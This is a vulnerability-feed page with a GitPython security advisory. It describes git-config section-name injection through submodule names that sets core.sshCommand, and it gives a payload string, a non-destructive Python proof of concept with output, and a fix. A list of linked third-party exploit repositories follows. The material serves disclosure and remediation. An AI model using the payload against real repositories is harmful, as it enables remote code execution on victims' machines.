Feed/GHSA-3rp5-jjmw-4wv2
GHSA-3rp5-jjmw-4wv2HIGHCVSS 7.0

GitPython: git-config section-name injection enables arbitrary config directives (core.sshCommand RCE)

Published Jul 24, 2026·Updated Jul 24, 2026

NVD Description

### Summary In GitPython `<= 3.1.52`, the config writer neutralizes only CR, LF, and NUL in configuration **names**, but writes section names into the `[...]` header with no other escaping. A section/subsection name that contains `] [ "` closes the intended header and opens a second same-line section, injecting an arbitrary config directive — with no newline required. Because a submodule **name** is attacker-controlled data (it comes from a repository's `.gitmodules`, or from an application that lets a user name a submodule) and is written verbatim into the parent repository's trusted `.git/config`, an attacker can set `core.sshCommand` (or `alias.*`, `core.pager`, `core.fsmonitor`) and achieve remote code execution on the victim's next git operation. Likely **CWE-74 (Injection)**. This is a distinct variant of the injection addressed by GHSA-mv93-w799-cj2w / GHSA-v87r-6q3f-2j67: those fixed **newline** injection into config values/names (patched in 3.1.50); the `[r\n\x00]` guard added for them does not stop a **same-line** section break inside a name. ### Details The only guard applied to section/option names before writing is `_assure_config_name_safe`, which uses a regex that matches solely CR/LF/NUL: `git/config.py:75,897-899` (`GitPython 3.1.52`): ```python UNSAFE_CONFIG_CHARS_RE = re.compile(r"[\r\n\x00]") ... def _assure_config_name_safe(self, name: "cp._SectionName", label: str) -> None: if isinstance(name, str) and UNSAFE_CONFIG_CHARS_RE.search(name): raise ValueError("Git config %s names must not contain CR, LF, or NUL" % label) ``` The name is then serialized into the header with no escaping of `]`, `[`, `"`, space, `=` or `#`: `git/config.py:693`: ```python fp.write(("[%s]\n" % name).encode(defenc)) ``` For submodules the name is wrapped as `submodule "<name>"` (`git/objects/submodule/util.py:39`, `return f'submodule "{name}"'`), which supplies the balancing quote. A submodule named: ``` x"] [core] sshCommand=CMD # ``` therefore serializes to the header `[submodule "x"] [core] sshCommand=CMD #"]`. git parses everything after the first `]` on that line as a fresh section, yielding `core.sshCommand=CMD` (the trailing `#"]` is an inline comment). No CR/LF/NUL appears, so `_assure_config_name_safe` never fires. The attacker-controlled name reaches this sink through documented public entry points that write it into the parent repository's `.git/config`: - `Repo.create_submodule(name=<untrusted>, ...)` → `Submodule.add` → `git/objects/submodule/base.py:619` `writer.set_value(sm_section(name), "url", url)` — a single call, no hostile remote required. - `Repo.clone_from(<hostile url>)` + `repo.submodule_update(init=True)` → `git/objects/submodule/base.py:855` `writer.set_value(sm_section(self.name), "url", self.url)`, where `self.name` is read unvalidated from the cloned repo's `.gitmodules`. Asymmetry: the sibling class is blocked — a newline in a config **value**, e.g. `set_value("core", "editor", "x\n\tsshCommand=CMD")`, raises `ValueError`. The section-**name** bracket payload is not caught by the same guard. ### PoC Single self-contained script, run against the pinned release in an ephemeral environment. Non-destructive: the injected value is an inert marker, verified parse-only with `git config --get`; no ssh/fetch/push is run and nothing is executed. ```python #!/usr/bin/env python3 """Minimal PoC: git-config section-name injection in GitPython==3.1.52.""" from importlib.metadata import version import os, tempfile, subprocess import git print(f"# GitPython {version('GitPython')}") # version proof -- first line MARKER = "MARKER_9f3a" # inert; never executed tmp = tempfile.mkdtemp() env = {**os.environ, "HOME": tmp, "GIT_CONFIG_GLOBAL": os.path.join(tmp, "gc"), "GIT_CONFIG_SYSTEM": os.devnull, "GIT_AUTHOR_NAME": "a", "GIT_AUTHOR_EMAIL": "a@b.c", "GIT_COMMITTER_NAME": "a", "GIT_COMMITTER_EMAIL": "a@b.c"} def run(*a, cwd=None): return subprocess.run(a, cwd=cwd, env=env, capture_output=True, text=True) # A benign local repo used as the submodule url (a plain path, no network). src = os.path.join(tmp, "src"); os.makedirs(src) run("git", "init", "-q", src) open(os.path.join(src, "f"), "w").write("x") run("git", "add", "f", cwd=src); run("git", "commit", "-qm", "i", cwd=src) suburl = os.path.join(tmp, "sub.git"); run("git", "clone", "-q", "--bare", src, suburl) def parent_repo(): p = tempfile.mkdtemp(dir=tmp) run("git", "init", "-q", p) open(os.path.join(p, "r"), "w").write("x") run("git", "add", "r", cwd=p); run("git", "commit", "-qm", "i", cwd=p) return p def injected_sshcommand(parent): r = run("git", "config", "-f", os.path.join(parent, ".git", "config"), "--get", "core.sshCommand") return (r.returncode, r.stdout.strip()) benign = "docs" evil = f'x"] [core] sshCommand={MARKER} #' # closes the header, opens [core] p_control = parent_repo() git.Repo(p_control).create_submodule(name=benign, path="docs", url=suburl) p_exploit = parent_repo() git.Repo(p_exploit).create_submodule(name=evil, path="sub", url=suburl) ctl = injected_sshcommand(p_control) exp = injected_sshcommand(p_exploit) header = [l for l in open(os.path.join(p_exploit, ".git", "config")).read().splitlines() if l.startswith("[submodule")][0] print("control name :", repr(benign)) print(" git core.sshCommand ->", ctl, "(unset)") print("exploit name :", repr(evil)) print(" written header ->", header) print(" git core.sshCommand ->", exp) assert ctl[0] != 0 and ctl[1] == "", "control unexpectedly set core.sshCommand" assert exp == (0, MARKER), "not reproduced" print(f"VERDICT: attacker-controlled submodule name injected core.sshCommand={MARKER} " f"into the victim's trusted .git/config (git would run it on the next ssh op)") ``` Run: ```bash uv run --with GitPython==3.1.52 python poc.py ``` Observed output: ``` # GitPython 3.1.52 control name : 'docs' git core.sshCommand -> (1, '') (unset) exploit name : 'x"] [core] sshCommand=MARKER_9f3a #' written header -> [submodule "x"] [core] sshCommand=MARKER_9f3a #"] git core.sshCommand -> (0, 'MARKER_9f3a') VERDICT: attacker-controlled submodule name injected core.sshCommand=MARKER_9f3a into the victim's trusted .git/config (git would run it on the next ssh op) ``` The benign name yields a single clean `[submodule "docs"]` section; the malicious name yields an injected `core.sshCommand`. Deterministic across runs. The payload must use balanced double-quotes (an unbalanced `"` makes git reject the header); the `submodule "<name>"` wrapper balances them automatically. ### Impact Arbitrary attacker-controlled write into the victim's repository-local `.git/config`, which git fully trusts. `core.sshCommand` is executed as the ssh transport command on the victim's next ssh git operation (fetch/pull/push), giving remote code execution; other injectable keys (`alias.*`, `core.pager`, `core.fsmonitor`) fire on more common operations. Reachable in default configuration through two realistic paths: - an application that constructs a submodule from untrusted input via `Repo.create_submodule(name=...)` (single call); or - `Repo.clone_from` of an untrusted repository followed by `submodule_update` — the canonical submodule threat model, where the malicious name is read from the cloned `.gitmodules`. No non-default git settings are required. Primarily a Unix vector: on Windows the `"` in the resulting `.git/modules/<name>` directory name can abort the fresh-clone write branch (the direct config-API and `create_submodule` sinks are unaffected). ### Recommended fix Reject or escape configuration section/subsection/option **names** that contain `]`, `[`, `"`, or leading/trailing whitespace (or apply git's own section-name escaping) in `_assure_config_name_safe` / `write_section`, rather than only CR/LF/NUL. Validating submodule names before they reach `sm_section` would additionally close the clone-driven path.

Affected Packages (1)

gitpythonPYPI
Fixed in = 3.1.52

Public Exploits & PoCs100 found

PoC: CVE-2026-38192

pluck-CMS-4.7.20-code-injection-vulnerability

2

PoC: cve-2024-55591-poc

Educational implementation in Go for CVE-2024-55591 (Fortinet FortiOS Authentication Bypass). Designed for security research, vulnerability assessment, and understanding WebSocket-based auth bypass mechanisms.

1

PoC: cve-2026-82329-jfrog-artifactory

CVE-2026-82329 JFrog Artifactory unauthenticated auth-bypass: reproducible Docker lab + URL-parameter validator PoC + patch-diff analysis

1

PoC: CVE-2026-82592

D-Link DIR-825M formDiskFormat stack overflow + command injection RCE PoC (CVE-2026-82592); for authorized security testing

1

PoC: My-Exploits

Metasploit modules, Python PoCs and throwaway Docker labs for four platform CVEs: Keycloak (CVE-2026-18963), Apache NiFi (CVE-2026-39816), HashiCorp Vault (CVE-2026-5006), HashiCorp Nomad (CVE-2026-7474).

1

PoC: CVE-2025-66478-PoC-Reverse-Shell

CVE-2025-66478 PoC

1

PoC: cve-writeups-and-pocs

CVE-2026-80724 PoC + full write-up — Linux kernel ptp/vmclock read-only mapping becomes writable (VM_MAYWRITE). Discovered, reported & fixed by Abdifatah Suruur (suruurism)

1

PoC: CVE-2026-79483-FastGPT-NoSQL-Injection

FastGPT Community Edition NoSQL Injection PoC (CVE-2026-79483)

1

PoC: givewp-cve-2026-82222-rce-lab

Authorized Docker lab and clean PoC for validating CVE-2026-82222 RCE in GiveWP 4.16.5.1 and the 4.16.7.2 fix.

1

PoC: CVE-2026-19745

Learn how I found my first two CVEs by pure accident.

1

PoC: cve-2026-23989-opencloud-lab

Reproduction lab (A/B Docker) for CVE-2026-23989 — OpenCloud / ownCloud Infinite Scale public-link scope-validation bypass in Reva

1

PoC: CVE-2026-21962-Blog

CVE-2026-21962 Açığı için blog sayfası oluşturdum.

1

PoC: PoC-and-yara-rules-of-CVE-2025-59528-Flowise-has-Remote-Code-Execution-vulnerability

poc and yara rules

1

PoC: CVE-2026-33017

CVE-2025-62593 — Ray Unauthenticated RCE Exploit is an unauthenticated remote code execution vulnerability in the Ray distributed AI compute engine.

PoC: CVE-2026-13753-poc

Poc of CVE-2026-13753

PoC: CVE-2026-82221

PoC for Unauthenticated Reflected Cross-Site Scripting (XSS) in RegistrationMagic WordPress Plugin

PoC: ActiveMQ-CVE-2023-46604

Exploit POC for Apache ActiveMQ CVE-2023-46604

PoC: gha-lab-0ba60e6456

Authorized security-research lab reproducing CVE-2024-39700 / GHSA-45gq-v5wm-82wg (JupyterLab extension-template update-integration-tests pwn request)

PoC: CVE-2026-36130

CVE-2026-36130

PoC: CVE-2026-31321

CVE-2026-31321

PoC: postgresql-cve-2026-14662

PostgreSQL の全文検索(tsvector/tsquery)に見つかった範囲外書き込み脆弱性 CVE-2026-14662 を、修正前(18.4)と修正後(18.6)を Docker で並べて動かして検証した記録と発表資料

PoC: CVE-2026-27472-and-CVE-2026-27474

PoC for CVE-2026-27472 and CVE-2026-27474

PoC: CVE-2026-27475

PoC for CVE-2026-27475

PoC: CVE-2026-18963

Unauthenticated account takeover via reset-credentials flow bypass

PoC: CVE-2026-0768

CVE-2026-0768 - Draft or TODO

PoC: CVE-2026-82329

CVE-2026-82329 - Draft or TODO

PoC: tomcat-line-check

CVE-2026-24880: does Apache's upgrade advice actually apply to your Tomcat? Detects the fix by class presence, not version comparison. Covers 7.0/8.0/8.5/9.0/10.0/10.1/11.0 lines.

PoC: log4j2-vuln-lab

CVE-2021-44228 (Log4Shell) 漏洞复现靶场 | SpringBoot + Log4j2 2.14.1 | 3 个攻击向量 PoC 验证

PoC: CVE-2021-3493-Exploit

It's a CVE-2021-3493 Exploit written in C

PoC: gha-lab-8e9316151c

Controlled security-research lab reproducing CVE-2024-1540 (GitHub Actions command injection in gradio-app/gradio deploy+test-visual.yml) — flattened snapshot of gradio-app/gradio @ f35f615e33a5dd90bfeb106b6f5dca689849fcef

PoC: gha-lab-6255f5fc33

Security-research lab reproducing CVE-2023-6572 (GHSA-gqvf-3hgp-5hxv): command injection in gradio-app/gradio's workflow_run handling of generate-changeset.yml

PoC: nextcloud-cve-2023-49792-research

A project analysis of CVE-2023-49792, inspired by a HackerOne report I have recently come across.

PoC: CVE-2026-30252

The ZenShare Suite application is vulnerable by a Reflected Cross-Site Scripting (XSS) vulnerability, affecting web application login and recovery password functionalities.

PoC: CVE-2026-30251

A reflected cross-site scripting (XSS) vulnerability in the login_newpwd.php endpoint of Interzen Consulting S.r.l ZenShare Suite v17.0 allows attackers to execute arbitrary Javascript in the context of the user's browser via a crafted URL injected into the codice_azienda parameter.

PoC: gha-lab-fb32aba4a3

Authorized lab reproduction of CVE-2023-26493 (GHSL-2023-027): command injection via github.head_ref in cocos-engine's <Web> Interface check pull_request_target workflow

PoC: CVE-2018-14667_Lab_POC

Demonstration of the expression language (EL) injection vulnerability CVE-2018-14667 using the photoalbum lab under Jboss application server

PoC: weakrng-sweep

Weak-RNG stream-sweep research (CVE-2026-71851 class): PRNG schemes x seeds -> BIP39 -> victim set membership

PoC: cve-2022-29117-assessment

CVE-2022-29117 (.NET Cookie-Handling DoS) Assessment, Understanding & Questions Framework

PoC: POC-CVE-2026-0073

Security research PoC for CVE-2026-0073: ADB authentication bypass verification

PoC: gha-lab-232af4821f

Security-research lab reproducing CVE-2021-4281 (GHSA-3796-3f93-cfvx): shell command injection via PR head-branch name in .github/workflows/combine-prs.yml (snapshot of BraveUX/for-the-badge @ 409c1fda). Do not use; authorized reproduction only.

PoC: CVE-2026-82222

GiveWP <= 4.16.7.1 Unauthenticated PHP Object Injection → RCE

PoC: CVE-2026-76569

Reflected XSS via search GET Parameter in Phoca Download

PoC: activemq-cve-lab

ActiveMQ CVE-2015-5254 模拟靶场 - 用于 CVE 测试评测和 SCA 扫描演示

PoC: ghostlock-x200-app

vivo X200 设备端一键 root App(Shizuku 授权 shell 域执行,CVE-2026-43499)

PoC: gha-lab-b9842b12c0

Authorized security-research lab reproducing CVE-2021-21423 (GHSA-gg2g-m5wc-vccq): projen rebuild-bot pwn request via issue_comment

PoC: gha-lab-e4a85583c3

Security-research lab reproducing CVE-2020-36762 (GHSA-h9gr-83jq-f3xc): bash command injection via github.event.comment.body in the comment workflow of ONSdigital/ras-collection-instrument

PoC: Root-My-Galaxy

KSU installer for supported Samsung Galaxy firmware with CVE-2026-43499

PoC: CVE-2026-78905-Facebook-Account-Takeover

Social Media Infrastructure Vulnerability Research. CVE-2026-78905: OAuth token reuse and session hijacking in Facebook's Graph API.

PoC: CVE-2026-78904-Digital-Dinar-Drain

CBDC Infrastructure Vulnerability Research. CVE-2026-78904: Infinite mint and redemption bypass in central bank digital currency APIs.

PoC: CVE-2026-78903-SWIFT-Kick-to-the-Creds

Offensive Research & Exploit Development. Vulnerability research, PoC development, and offensive tooling for financial infrastructure.

PoC: CVE-2026-60004-Gitea-RCE-PoC

🫖 Direct single-target Gitea CVE-2026-60004 RCE validation PoC

PoC: CVE-2026-60004-Gitea-Validator

🫖 Contract-correlated discovery and authorized validation tool for Gitea CVE-2026-60004

PoC: cve-2026-67363-67364

Balboa form Command Injection POC

PoC: Simulation-d-attaque-BlueBorne-sur-v-hicule-connect-

Simulation complète d'une attaque Bluetooth (CVE-2017-1000251) sur un véhicule autonome via CARLA Simulator ; exploitation de la vulnérabilité BlueBorne pour accéder au bus CAN et déclencher un freinage brutal, en environnement isolé (Kali Linux VM / VMware / Python).

PoC: CVE-2026-76581-Detector

Safe passive detector for identifying WPMU DEV Dashboard versions affected by CVE-2026-76581.

PoC: htb-machine-ringdown

Detailed design & exploitation writeup for Ringdown—an original Debian/Asterisk vulnerable machine featuring CVE-2024-42365 (AMI), PJSIP pre-hash cracking, and Fail2ban POSIX ACL privilege escalation.

PoC: gha-lab-83342297e0

Authorized security-research lab reproducing CVE-2024-41127 (GHSA-wcjf-5464-4wq9): poisoned pipeline execution via artifact-controlled code injection in ci-failure-comment.yml. Snapshot of monkeytypegame/monkeytype @ deeea0f.

PoC: WP2Shell-Scanner

Read-only CLI to check whether a WordPress site is exposed to WP2Shell (CVE-2026-63030 / CVE-2026-60137)

PoC: phpBB-CVE-2026-48611

Automated PoC for CVE-2026-48611 — phpBB OAuth login_link authentication bypass

PoC: Project-CVE-2026-45833

CVE-2026-45833 ChromaDB

PoC: CitrixBleedCVE-2026-8452-2025-5777

CitrixBleed Exploit Tool - CVE-2025-5777 & CVE-2026-8452. Unauthenticated remote memory read from Citrix NetScaler ADC & Gateway. Steal admin session tokens, extract nsroot hashes, dump secrets, and bypass MFA. Python 3 exploit with full memory parsing.

PoC: CVE-2026-76581

CVE-2026-76581

PoC: drupalgeddon2-cve-lab

Drupalgeddon2 CVE-2018-7600 vulnerable Drupal 7 lab

PoC: shellshock-cve-lab

Shellshock CVE-2014-6271 vulnerable CGI lab

PoC: log4shell-cve-lab

Log4Shell CVE-2021-44228 vulnerable lab

PoC: CVE-2026-18741

PoC CVE-2026-18741

PoC: CVE-2026-12513

CVE-2026-12513 Vulnerability Advisory & PoC — Discovered by Huynh Kien Minh (MinhHK).

PoC: ghostlock-oppo-watch3pro

CVE-2026-43499 on OPPO Watch 3 Pro

PoC: cve-2026-82222-poc

Public PoC for CVE-2026-82222

PoC: zk-xml-probe

Static XML fixtures for authorized bug bounty testing of XML parser behaviour (CVE-2026-45071).

PoC: SOC335-CVE-2024-49138-Investigation

SOC investigation of a CVE-2024-49138 exploitation alert using log analysis, threat intelligence, and endpoint containment.

PoC: papercut-toolkit

#PaperCut CVE-2026-81578 + CVE-2026-82078 Defense Toolkit 2 3 A **defensive** toolkit to check and understand exposure to the chained

PoC: PaperCut-CVE-2026-81578-82078

Security research tool for PaperCut CVE-2026-81578 & CVE-2026-82078

PoC: vankyo-s30-bootloader-unlock

Vankyo MatrixPad S30 (Unisoc SC9863A) — Bootloader unlock via CVE-2022-38694 FDL1 method

PoC: CVE-2026-21962-Blog

CVE-2026-21962 Açığı için blog sayfası oluşturdum.

PoC: hdwebmobile-formula-pricing

WooCommerce plugin: safe formula-based product pricing, closing CVE-2026-4001's eval()-based RCE

PoC: CVE-2026-82286-gpt-crawler-Arbitrary-File-Write

CVE-2026-82286 — gpt-crawler <=1.5.1 unauthenticated arbitrary file write via outputFileName (POST /crawl). PoC + self-contained Docker lab. CVSS 8.6, CWE-22.

PoC: CVE-2026-24061-payload

A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass

PoC: CVE-2026-66384

CVE-2026-66384 - Draft or TODO

PoC: CVE-2026-33017-PoC-Reverse-Shell

CVE-2026-33017 PoC Reverse Shell

PoC: CVE-2026-33057---Mesop-Unauthenticated-RCE-PoC-and-yara-rules

CVE-2026-33057 - Mesop Unauthenticated RCE PoC and yara rules

PoC: CVE-2026-10036-speechbrain-rce

SpeechBrain < 1.1.1 checkpoint metadata RCE via unsafe PyYAML parsing of CKPT.yaml.

PoC: CVE-2025-55182-poc

I know you are probably here from Hack the Box, if so, yes this one actually works.

PoC: Project-CVE-2026-50751

IKEv1 VPN scanners, attempts a Check Point authentication-bypass exploit, and includes internal network scanning and reverse-shell features.

PoC: CTT-Enhanced-CVE-2026-46339-Exploit-Engine

A specialized Python framework that executes unauthenticated remote code execution via the 9Router Model Context Protocol (MCP) bridge by deploying a 33-layer temporal phase cascade, Riemann-Hadamard dispersion, and an 11 ns wedge filter to bypass traditional proxy and process-monitoring defenses.

PoC: Zimbra-CVE-2026-73570-Rules

Wazuh Rules for Detection Zimbra (CVE-2026-73570).

PoC: CVE-2022-46169

Cacti 1.2.22 unauthenticated command injection

PoC: CVE-2024-23897

Jenkins CVE-2024-23897 — CSRF-crumb aware PoC

PoC: CVE-2025-10952-ml-logger-AFR

PoC for CVE-2025-10952 — ml-logger unauthenticated arbitrary file read. CVSS 5.3

PoC: CVE-2026-65643

CVE-2026-65643 - Draft or TODO

PoC: cve-2023-23397-detection-lab

Detection and mitigation research lab for CVE-2023-23397 using network and endpoint security telemetry.

PoC: fastjson-cve

fastjson-cve-2026-16723

PoC: CVE-2026-23751-poc

Patched RemotingClient to exploit CVE-2026-23751 (Tungsten Automation - Kofax Capture Unauthenticated File Read/Write and SMB coercion via .NET HTTP Remoting)

PoC: CVE-2023-27350-CVE-2023-27351

CVE-2023-27350, CVE-2023-27351 - PaperCut - Draft or TODO

PoC: Project-CVE-2026-33017

CVE-2026-33017 - Langflow Unauthenticated RCE Exploit

PoC: CVE-2026-70463

Testing CVE-2026-70463 by Fyyre

PoC: 2025-Oracle-SSO-LDAP-Attack-Post-Incident-Written-Report

Post-incident report analyzing the Oracle Cloud SSO/LDAP supply chain attack (CVE-2021-35587). Details the exploitation of legacy server infrastructure, impact across 140,000+ cloud tenants, root-cause findings, and phased mitigation strategies.

PoC: CVE-2026-20131-Post-Incident-Written-Report

Post-incident report on CVE-2026-20131 (CVSS 10.0), a Cisco FMC insecure deserialization vulnerability exploited by Interlock ransomware. Details root-cause analysis, lateral movement tactics, and emergency containment strategies.

PoC: ghostlock-pfem10

GhostLock (CVE-2026-43499 / IonStack) research for OPPO Find X5 Pro (PFEM10): exploit chain, progress, blocker log, and OPPO 5-series kernel notes

PoC: htb-labs-connected

Hack The Box Connected machine write-up featuring enumeration, CVE-2025-57819 exploitation, reverse shell, and privilege escalation to root via FreePBX and incron.

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

References

View on NVD Search GitHub Search Google

Get alerted for CVEs like this

Register your stack and get notified within minutes when a matching CVE drops.

Start monitoring free